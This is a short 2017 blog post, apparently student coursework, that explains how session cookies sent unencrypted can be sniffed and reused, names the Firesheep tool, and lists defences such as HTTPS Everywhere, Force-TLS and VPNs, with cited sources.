Thursday, 14 December 2017

SESSION HIJACKING USING FIRESHEEP




Week Five ↓

 Most websites use Secure Socket Layer(SSL) encryption (indicated by ‘https://’) when a user submits login credentials, but subsequent data exchanges are not encrypted (Krebs, 2010). These websites use cookies to identify sessions and these cookies are sent unencrypted with post-login data. Once these cookies are intercepted by an eavesdropper during sniffing, and the contents are known, a bogus HTTP request can then be created using this cookie; to access a victim’s account. Eric Butler in 2010 released a tool called “Firesheep” that allows “hackers to eavesdrop on unencrypted wireless networks and steal the sessions of other users who are logged on to popular websites” (Mike, 2011). With this Firefox extension, a malicious user can gain access to different sessions. Firesheep is available on all Operating systems.

countermeasures

“The most effective solution to this is end-to-end encryption, known on the web as HTTPS or SSL” (Krebs, 2010). Two of the most widely used Firefox add-ons that provide encryption while surfing using public networks are presented. They force specific websites to encrypt all traffic (including post-login traffic) (Krebs, 2010).

  • HTTPS Everywhere. “This extension encrypts communication with a number of major websites by default” (Mohit, 2010). It also allows users to add other sites to the “HTTPS” list.




  • Force-TLS. This add-on does not come with any websites listed, but allows you to add new websites to its list.


Also, tunneling your connections through a VPN will provide encryption and make your communication obfuscated to eavesdroppers (Mike, 2011).

References

Krebs Brian. (October, 2010). Firesheep: Baaaaad News for the Unwary’ Released. Retrieved from https://krebsonsecurity.com/2010/10/firesheep-baaaaad-news-for-the-unwary/
Mohit Kumar. (November, 2010). HTTPS Everywhere: Another tool to protect from Firesheep. Retrieved from https://thehackernews.com/2010/12/https-everywhere-another-tool-to.html
Mike Chapple. (February, 2011). Firesheep, Fireshepherd, and Facebook: Understanding Session Hijacking. Retrieved from http://www.ciscopress.com/articles/article.asp?p=1680707&seqNum=2


Video Credit: Daniel Taschik. November 14, 2012

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)